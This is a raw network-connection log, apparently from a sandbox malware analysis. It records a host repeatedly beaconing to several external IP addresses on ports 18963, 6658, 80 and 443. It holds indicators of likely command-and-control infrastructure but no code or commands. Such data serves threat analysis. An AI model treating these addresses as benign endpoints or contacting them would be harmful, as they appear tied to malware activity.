                                                                                                                                                                        Dec 19, 2024 15:45:16.266760111 CET8049760116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:16.266824007 CET4976080192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:16.267159939 CET4976480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:16.273319006 CET1896349762107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:16.384722948 CET1896349763107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:16.387288094 CET8049764116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.048171997 CET4976218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.048203945 CET4976318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.048222065 CET4976480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:20.051182032 CET4976518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.171016932 CET1896349765107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.171106100 CET4976518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.171262026 CET4976518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.180697918 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:20.181297064 CET4976718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.290837049 CET1896349765107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.300484896 CET8049766116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.300565958 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:20.300904036 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:20.301244974 CET1896349767107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.301309109 CET4976718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.312871933 CET4976718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:20.420370102 CET8049766116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.433653116 CET1896349767107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.905200958 CET665849745107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:20.905294895 CET497456658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:21.170860052 CET497696658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:21.290963888 CET665849769107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:21.291037083 CET497696658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:21.291465998 CET497696658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:21.410979986 CET665849769107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:22.017090082 CET8049766116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:22.017199993 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:22.034096003 CET49770443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:22.034172058 CET44349770116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:22.034245968 CET49770443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:22.034579039 CET49770443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:22.034591913 CET44349770116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.174267054 CET4976718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.174361944 CET4976518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.174361944 CET49770443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.174952030 CET4977118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.294574976 CET1896349771107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.294663906 CET4977118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.294791937 CET4977118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.349034071 CET4977218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.350399971 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.350641966 CET4977380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.414549112 CET1896349771107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.469080925 CET1896349772107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.469244957 CET4977218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.472295046 CET8049773116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.473217010 CET4977380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.481132984 CET4977218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:24.481162071 CET4977380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.483217955 CET8049766116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.483411074 CET4976680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:24.600698948 CET1896349772107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:24.600790024 CET8049773116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:26.194787025 CET8049773116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:26.194962025 CET4977380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:26.244735956 CET49774443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:26.244785070 CET44349774116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:26.244895935 CET49774443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:26.245129108 CET49774443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:26.245148897 CET44349774116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:28.298070908 CET4977118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:28.298106909 CET49774443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:28.298130035 CET4977218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:28.298552036 CET4977518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:28.411101103 CET4977618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:28.420247078 CET1896349775107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:28.420322895 CET4977518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:28.420633078 CET4977518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:28.462570906 CET4977380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:28.462971926 CET4977780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:28.531059980 CET1896349776107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:28.531207085 CET4977618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:28.541662931 CET4977618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:28.541704893 CET1896349775107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:28.586168051 CET8049773116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:28.586280107 CET4977380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:28.586317062 CET8049777116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:28.586380005 CET4977780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:28.586559057 CET4977780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:28.662987947 CET1896349776107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:28.707547903 CET8049777116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:30.985765934 CET8049777116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:30.985896111 CET4977780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:31.028386116 CET49778443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:31.028422117 CET44349778116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:31.028522015 CET49778443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:31.029102087 CET49778443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:31.029120922 CET44349778116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:32.322597980 CET4977518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:32.322670937 CET4977618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:32.322757959 CET49778443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:32.323266983 CET4977918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:32.443006992 CET4978018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:32.443046093 CET1896349779107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:32.443125010 CET4977918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:32.443223000 CET4977918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:32.444278002 CET4977780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:32.444554090 CET4978180192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:32.562797070 CET1896349780107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:32.562812090 CET1896349779107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:32.562918901 CET4978018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:32.563079119 CET4978018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:32.564373970 CET8049781116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:32.564591885 CET8049777116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:32.564639091 CET4977780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:32.565167904 CET4978180192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:32.565167904 CET4978180192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:32.682490110 CET1896349780107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:32.684633970 CET8049781116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:34.273015022 CET8049781116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:34.273735046 CET4978180192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:34.287338972 CET49782443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:34.287395000 CET44349782116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:34.287549973 CET49782443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:34.287847042 CET49782443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:34.287863016 CET44349782116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.127737999 CET44349782116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.127856016 CET49782443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.128490925 CET44349782116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.128566027 CET49782443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.139190912 CET49782443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.139204979 CET44349782116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.139606953 CET44349782116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.139758110 CET49782443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.141937971 CET49782443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.183322906 CET44349782116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.314726114 CET4977918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:36.314748049 CET49782443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.314796925 CET4978018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:36.315207005 CET4978318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:36.426955938 CET4978418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:36.427072048 CET4978180192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.427252054 CET4978580192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.434693098 CET1896349783107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.434782028 CET4978318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:36.434906006 CET4978318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:36.546614885 CET1896349784107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.546720982 CET8049785116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.546746969 CET4978418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:36.546789885 CET4978580192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.547027111 CET4978418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:36.547036886 CET4978580192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.547120094 CET8049781116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.547188997 CET4978180192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:36.554456949 CET1896349783107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.666650057 CET1896349784107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:36.666666031 CET8049785116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:38.289331913 CET8049785116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:38.289439917 CET4978580192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:38.291739941 CET49786443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:38.291785955 CET44349786116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:38.291866064 CET49786443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:38.292090893 CET49786443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:38.292104006 CET44349786116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:40.156505108 CET44349786116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:40.156579018 CET49786443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:40.157077074 CET49786443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:40.157088995 CET44349786116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:40.158787966 CET49786443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:40.158793926 CET44349786116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:40.317140102 CET4978418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:40.317163944 CET4978318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:40.317163944 CET49786443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:40.318038940 CET4978718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:40.437675953 CET1896349787107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:40.437757015 CET4978718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:40.437948942 CET4978718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:40.487214088 CET4978818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:40.489962101 CET4978580192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:40.490236044 CET4978980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:40.557529926 CET1896349787107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:40.606892109 CET1896349788107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:40.607034922 CET4978818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:40.609720945 CET4978818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:40.609736919 CET8049789116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:40.609824896 CET4978980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:40.609944105 CET8049785116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:40.610004902 CET4978580192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:40.610619068 CET4978980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:40.729398012 CET1896349788107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:40.730122089 CET8049789116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:43.137818098 CET8049789116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:43.137902021 CET4978980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:43.163882971 CET49790443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:43.163933039 CET44349790116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:43.164036036 CET49790443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:43.164645910 CET49790443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:43.164657116 CET44349790116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:43.280642033 CET665849769107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:43.280750036 CET497696658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:43.393899918 CET497916658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:43.513494968 CET665849791107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:43.513618946 CET497916658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:43.513998032 CET497916658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:45:43.633455992 CET665849791107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:44.438855886 CET49790443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:44.438893080 CET4978818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:44.439102888 CET4978718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:44.439578056 CET4979218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:44.552165985 CET4978980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:44.552447081 CET4979380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:44.553246021 CET4979418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:44.559290886 CET1896349792107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:44.559426069 CET4979218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:44.559549093 CET4979218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:44.672012091 CET8049793116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:44.672154903 CET8049789116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:44.672187090 CET4979380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:44.672235012 CET4978980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:44.672339916 CET4979380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:44.672696114 CET1896349794107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:44.672746897 CET4979418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:44.672871113 CET4979418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:44.679150105 CET1896349792107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:44.791898012 CET8049793116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:44.792366982 CET1896349794107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:48.454782009 CET4979380192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:48.454798937 CET4979218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:48.454798937 CET4979418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:48.455338955 CET4979518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:48.574901104 CET1896349795107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:48.574990988 CET4979518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:48.575156927 CET4979518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:48.631555080 CET4979618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:48.632101059 CET4979780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:48.694691896 CET1896349795107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:48.751197100 CET1896349796107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:48.751367092 CET4979618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:48.751569986 CET4979618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:48.751619101 CET8049797116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:48.751694918 CET4979780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:48.752084970 CET4979780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:48.871206045 CET1896349796107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:48.872225046 CET8049797116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:52.605957985 CET4979618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:52.606081963 CET4979518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:52.606086016 CET4979780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:52.630383968 CET4979818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:52.750653982 CET1896349798107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:52.750746965 CET4979818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:52.753252983 CET4979818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:52.786315918 CET4979918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:52.787664890 CET4980080192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:52.872805119 CET1896349798107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:52.906363010 CET1896349799107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:52.906650066 CET4979918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:52.906728029 CET4979918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:52.907522917 CET8049800116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:52.907629967 CET4980080192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:52.910507917 CET4980080192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:53.026410103 CET1896349799107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:53.030112982 CET8049800116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:56.751358032 CET4979818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:56.751404047 CET4979918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:56.751441002 CET4980080192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:56.751966000 CET4980118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:56.872003078 CET1896349801107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:56.872100115 CET4980118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:56.872338057 CET4980118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:56.903697014 CET4980280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:56.907773972 CET4980318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:56.991991997 CET1896349801107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:57.023830891 CET8049802116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:57.023936987 CET4980280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:57.024122000 CET4980280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:45:57.027542114 CET1896349803107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:57.027609110 CET4980318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:57.027714014 CET4980318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:45:57.143819094 CET8049802116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:45:57.147520065 CET1896349803107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:00.871301889 CET4980118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:00.871330023 CET4980280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:00.871371984 CET4980318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:00.871884108 CET4980418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:00.992042065 CET1896349804107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:00.992108107 CET4980418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:00.992532969 CET4980418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:01.112251043 CET1896349804107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:01.133941889 CET4980618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:01.136033058 CET4980580192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:01.253685951 CET1896349806107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:01.253850937 CET4980618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:01.254297972 CET4980618963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:01.255878925 CET8049805116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:01.256052971 CET4980580192.168.2.11116.133.8.92
